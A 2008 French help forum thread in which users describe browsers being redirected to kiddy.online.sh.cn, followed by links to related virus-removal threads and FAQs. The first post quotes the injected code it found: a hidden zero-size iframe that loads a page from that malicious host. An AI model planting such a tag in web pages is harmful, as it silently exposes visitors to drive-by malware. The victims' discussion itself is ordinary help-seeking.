Flux rss
Rechercher : dans
Par : Mots clés Nom d'utilisateur
Messages sans réponse

Virus kiddy.online.sh.cn

Innocent, le vendredi 7 mars 2008 à 11:42:49 
 Signaler ce message aux modérateurs

Bonjour,

A chaque fois que je navigue sur le Net, je me suis rediriger vers le site kiddy.online.sh.cn et ma connexion se plante et j'obtiens un écran vide.

Quand je regarde la source de la page, je trouve cette balise au première ligne (en entête)<iframe src='http://kiddy.online.sh.cn/upimages/test/index.htm' width=0 height=0</iframe>

Si quelq'un a déjà rencontré ce genre de pb, merci de m'aider.

NB: L'apparition de cette erreur est aléatoire et je l'ai remarqué que tous les deux jours, il apparaît

Merci pour les aides!!

Jnre

Configuration: Windows XP
Internet Explorer 7.0

1

nirinapatrick, le mercredi 19 mars 2008 à 09:32:23

Moi aussi g le même problème ke toi. C'est énervant, la page reste blanche pour google, hotmail, et pleins d'autres sites (au fait ça dépend). Si quelqu'un a la solution please help on est dans la M...

Répondre à nirinapatrick

2

ravaka, le mercredi 19 mars 2008 à 14:21:09

Pareil, et apparement même mon super (soi-disant) antivirus de la mort (Kaspersky) ne le voit même pas passer!!! et tout notre bureau en est infecté!!! Si quelqu'un peut aider d'urgence ce seraiit génial car c'est nombreux sites qui sont bloqués!

Répondre à ravaka

16

gtic007, le lundi 21 juillet 2008 à 08:56:28

C'est détaillé sur ce site http://www.easy-concept.com/...

Répondre à gtic007
Rootkit et virus Win32:OnlineGames-CVC (Résolu) Bonsoir Après avoir avoir fait un scan de mon ordi, avast a détecté le virus Win32:OnlineGames-CVC j'ai supprimé tous les fichiers infectés donc à priori pas de problème mais quelques heures plus tard avast me signal la présence d'un... www.commentcamarche.net/forum/affich-6643390-rootkit-et-virus-win32-onlinegames-cvc
COMENT NEUTRALISER VIRUS DETECT PAR KASPERSKY Bonjour, KASPERSKY a détécté deux menaces lors de l'analyse,l'un des deux virus est très dangereux et l'autre moyennement dangereux,comment faire pour neutraliser ses virus? merci de me répondre trés vite. REMARQUE:la vérsion de KASPERSKY que j'ai... www.commentcamarche.net/forum/affich-11611147-coment-neutraliser-virus-detect-par-kaspersky
Virus WIN32/PSW.OnLineGames.NOI trojan Bonjour, J'ai un grand problème que je n'arrive pas à résoudre. A chaque fois que je connecte un flash disk (clé USB) mon anti-virus detect un virus nommé : WIN32/PSW.OnLineGames.NOI trojan et je n'arrive pas à le supprimer même si je formate mon... www.commentcamarche.net/forum/affich-6193154-virus-win32-psw-onlinegames-noi-trojan
[Virus] Que faire quand on est infecté ?Si vous savez ou vous pensez être infecté par un virus Si vous savez ou vous pensez être infecté par un virus, il faut s'en occuper le plus rapidement possible car l'infection peut inviter d'autres infections dans votre PC et votre système risque... www.commentcamarche.net/faq/sujet-32-virus-que-faire-quand-on-est-infecte
Virus et Malwares ... Le truc pour les éliminerDe nombreux virus, trojans, spywares et autres malwares circulent sur le net. Ils provoquent des changements de page d'accueil Internet Explorer (ils empêchent même dans certains cas de la changer), des affichages indésirables, sans parler des risques... www.commentcamarche.net/faq/sujet-484-virus-et-malwares-le-truc-pour-les-eliminer
[Virus] System Volume InformationSommaire Explications Exemple Supprimer un virus logé dans le dossier System Volume Information sous Windows XP Informations supplémentaires Explications Le dossier System Volume Information est utilisé par Windows XP pour... www.commentcamarche.net/faq/sujet-5097-virus-system-volume-information
Liste meilleurs antivirus online SVP merci!!! (Résolu)Bonjour à ts!!! Je n'ai pas de pb majeurs avc les virus en ce moment ms mieux vaut prévenir ke guérir!!! J'aurais dc voulu savoir si qqn pouvait me renseigner sur les meilleurs antivirus online et les freeware. Voilà merci bcp pr votre aide!!! Bonne... www.commentcamarche.net/forum/affich-1042970-liste-meilleurs-antivirus-online-svp-merci
Trojan-GameThief.Win32.OnLineGames.arvn (Résolu)Bonjour, Je viens de chopper un virus sur ma cle USB. J'ai fait un scan avec Kaspersky 7.0.25.0 mis a jour le 23 Sept qui me detecte le virus suivant : Trojan-GameThief.Win32.OnLineGames.arvn Quelqu'un a une idee pour l'enlever sans tout effacer sur... www.commentcamarche.net/forum/affich-8559258-trojan-gamethief-win32-onlinegames-arvn
Trojan.onlinegames.es (Résolu)Bonjour, Je viens d'être infectée par le trojan onlinegames.es En fait je n'ai pour seul anti virus que le spydocteur et celui ci s'est mis à m'ouvrir des dizaines de fenêtres disant que j'étais menacée et qu'il avait bloqué des accès. Je viens de... www.commentcamarche.net/forum/affich-4598045-trojan-onlinegames-es
Télécharger AVG Anti-VirusComme son nom l’indique AVG Anti-virus permet d’éradiquer : les spywares, adwares, les vers, les virus, logiciels espions, cheval de Troie ou autres logiciels malveillants qui infectent votre système. Son interface conviviale permet de... www.commentcamarche.net/telecharger/telecharger-218-avg-anti-virus
Télécharger Online TV PlayerSi vous possédez une connexion illimitée à la maison, de préférence haut-débit, il ne vous est plus nécessaire de posséder un poste téléviseur. Online TV Player est un programme qui vous permet d'accéder à plus de 850 chaînes TV sur Internet et... www.commentcamarche.net/telecharger/telecharger-34056490-online-tv-player
Télécharger Avast! Virus CleanerTout le monde connaît l' antivirus gratuit Avast. Son éditeur propose avast! Virus Cleaner, un nettoyeur de virus gratuit, permettant de supprimer de l'ordinateur, les infections d'une vaste gamme de virus et de vers (worms). Si, malgré toutes... www.commentcamarche.net/telecharger/telecharger-34055089-avast-virus-cleaner
Le virus Koobface sévit sur Facebook(Paris - Relax news) - Un virus, baptisé "Koobface", menace potentiellement les 120 millions d'utilisateurs du célèbre réseau social Facebook. Le programme en question se sert du système de messagerie du site pour infecter les ordinateurs des... www.commentcamarche.net/actualites/le-virus-koobface-sevit-sur-facebook-5847853-actualite.php3
Virus - Introduction aux virusVirus Un virus est un petit programme informatique situé dans le corps d'un autre, qui, lorsqu'on l'exécute, se charge en mémoire et exécute les instructions que son auteur a programmé. La définition d'un virus pourrait être la suivante : « Tout... www.commentcamarche.net/contents/virus/virus.php3
Utilitaires de désinfection des principaux virus et versQu'est-ce qu'un kit de désinfection ? Un kit de désinfection est un petit exécutable dont le but est de nettoyer une machine infectée par un virus particulier. Chaque kit de désinfection est donc uniquement capable d'éradiquer un type de virus... www.commentcamarche.net/contents/virus/desinfection.php3
Le virus Blaster / LovSanPrésentation du virus LovSan Apparu durant l'été 2003, le virus LovSan (connu également sous les noms W32/Lovsan.worm, W32/Lovsan.worm.b, W32.Blaster.Worm, W32/Blaster-B, WORM_MSBLAST.A, MSBLASTER, Win32.Poza, Win32.Posa.Worm, Win32.Poza.B) est le... www.commentcamarche.net/contents/virus/lovsan-blaster.php3